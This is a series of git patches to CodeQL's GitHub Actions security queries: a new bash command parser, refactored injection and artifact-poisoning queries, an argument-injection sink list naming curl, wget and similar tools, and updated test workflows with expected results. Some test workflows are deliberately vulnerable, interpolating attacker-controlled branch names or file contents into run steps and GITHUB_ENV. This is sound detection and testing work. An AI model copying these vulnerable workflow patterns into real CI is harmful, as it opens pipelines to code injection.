"") + .regexpReplaceAll("\\)$", ""), + // `...` command substitution + stmt_ + .regexpFind("\\`[^\\`]+\\`", _, _) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", ""), + // original line with no substitutions + stmt_ + .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") + .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") + ] and + // We shoulg replace quoted arguments with a placeholder to avoid splitting them + // eg: ls | grep -E "*.(tar.gz|zip)$" + //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and + ( + stmt.regexpMatch(".*\"([^\"]+)\".*") and + exists(int i | + subline2 = + stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), + stmt.regexpFind("\"([^\"]+)\"", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + stmt.regexpMatch(".*'([^']+)'.*") and + exists(int i | + subline2 = + stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), + stmt.regexpFind("'([^']+)'", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + not stmt.regexpMatch(".*'([^']+)'.*") and + not stmt.regexpMatch(".*\"([^\"]+)\".*") and + subline2 = stmt + ) and + cmd = subline2.splitAt(splitSeparators()).trim() and + // when splitting the line with a separator that is not found, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not cmd.indexOf(splitSeparators()) > -1 and + not cmd = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", + "case", "esac", "{", "}" + ] and + result = + cmd.replaceAll("::PIPE::", "|") + .replaceAll("::SEMICOLON::", ";") + .replaceAll("::AND::", "&&") + .replaceAll("::OR::", "||") + ) + } + + bindingset[script] + predicate getAnAssignment(string script, string name, string value) { + exists(string stmt | + stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f2d3698597f..5b96781a10b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,6 +1319,12 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + string getACommand() { result = Bash::getACommand(this.getScript()) } + + predicate getAnAssignment(string name, string value) { + Bash::getAnAssignment(this.getScript(), name, value) + } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } From a5075e52161509c245e0e0390ce4929e189c450f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:42 +0200 Subject: [PATCH 0558/1267] Change queries to use the new bash parser --- .../security/ArgumentInjectionQuery.qll | 14 ++-- .../security/ArtifactPoisoningQuery.qll | 64 ++++++------------- .../codeql/actions/security/ControlChecks.qll | 11 ++-- .../security/EnvPathInjectionQuery.qll | 7 +- .../actions/security/EnvVarInjectionQuery.qll | 7 +- .../security/OutputClobberingQuery.qll | 11 ++-- .../actions/security/PoisonableSteps.qll | 8 +-- .../security/UntrustedCheckoutQuery.qll | 36 +++++------ 8 files changed, 61 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 37f966668df..6e1a5c0f229 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -28,13 +28,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ) or exists( - Run run, string line, string argument, string regexp, int argument_group, int command_group + Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and run.getScriptScalar() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } @@ -60,12 +60,12 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { source instanceof RemoteFlowSource or exists( - Run run, string argument, string line, string regexp, int command_group, int argument_group + Run run, string argument, string cmd, string regexp, int command_group, int argument_group | run.getScriptScalar() = source.asExpr() and - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index ebe22140be2..b7015590614 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -155,71 +155,54 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getScript() = script and - script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and - script.splitAt("\n").matches("%github.event.workflow_run.id%") and + this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getACommand().matches("%github.event.workflow_run.id%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or + this.getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - DirectArtifactDownloadStep() { // eg: // run: | @@ -230,32 +213,25 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getScript() = script and - script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 134ce780eee..801ccb6e986 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -255,10 +255,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { - exists(string line | - line = this.getScript().splitAt("\n") and - line.toLowerCase() - .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + exists(string cmd1, string cmd2 | + cmd1 = this.getACommand() and + cmd2 = this.getACommand() and + not cmd1 = cmd2 and + cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and + cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") ) } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 40c0c7da9eb..923d950631d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -37,11 +37,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 4f54f38f274..6f325ca4c93 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -42,11 +42,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 38a8d2b9d0b..4a488f945b9 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -56,11 +56,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") @@ -154,11 +151,11 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { // A file is read and its content is printed to stdout // - run: echo "foo=$( Date: Wed, 2 Oct 2024 12:34:01 +0200 Subject: [PATCH 0559/1267] Add new Argument Injection sinks --- ql/lib/ext/config/argument_injection_sinks.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index ab523c59303..95f81313168 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,12 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)(.*?)", 2, 3] - - ["(curl)(.*?)", 2, 3] - - ["(find)(.*?)", 2, 3] - - ["(git)(.*?)", 2, 3] - - ["(sed)(.*?)", 2, 3] - - ["(tar)(.*?)", 2, 3] - - ["(wget)(.*?)", 2, 3] - - ["(zip)(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 2, 3] + - ["(curl)\\s(.*?)", 2, 3] + - ["(find)\\s(.*?)", 2, 3] + - ["(git)\\s(.*?)", 2, 3] + - ["(sed)\\s(.*?)", 2, 3] + - ["(tar)\\s(.*?)", 2, 3] + - ["(wget)\\s(.*?)", 2, 3] + - ["(zip)\\s(.*?)", 2, 3] From 805269683617f8d168234e1f8b646aa432b0830b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:10 +0200 Subject: [PATCH 0560/1267] Add new Poisonable step for bun --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f79ca795cd0..1543e2d8d45 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -19,6 +19,7 @@ extensions: - ["asv"] - ["awk\\s+-f"] - ["bundle"] + - ["bun"] - ["cargo"] - ["checkov"] - ["eslint"] From 6b98a5b5b16266c360b5116e80d7afce07f60e03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:27 +0200 Subject: [PATCH 0561/1267] Update tests --- .../.github/workflows/workflow_run_branches5.yml | 13 +++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../.github/workflows/artifactpoisoning52.yml | 3 +-- .../.github/workflows/artifactpoisoning53.yml | 2 +- .../CWE-829/ArtifactPoisoningCritical.expected | 12 ++++++------ .../CWE-829/ArtifactPoisoningMedium.expected | 8 ++++---- .../CWE-829/UntrustedCheckoutCritical.expected | 2 +- 8 files changed, 30 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml new file mode 100644 index 00000000000..5e391db21aa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches-ignore: ["foo"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 207fb3abf01..61c851a2cfa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | @@ -566,4 +567,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e5ad4688852..db8e7b485d7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | @@ -490,3 +491,4 @@ subpaths | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml index 130668b8515..e4845a6f2f1 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -18,8 +18,7 @@ jobs: - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" echo "EOF" >> "${GITHUB_ENV}" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml index 7c255e7722d..67209267b5c 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -18,7 +18,7 @@ jobs: - run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 74edee72f5f..985af04112a 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | @@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | 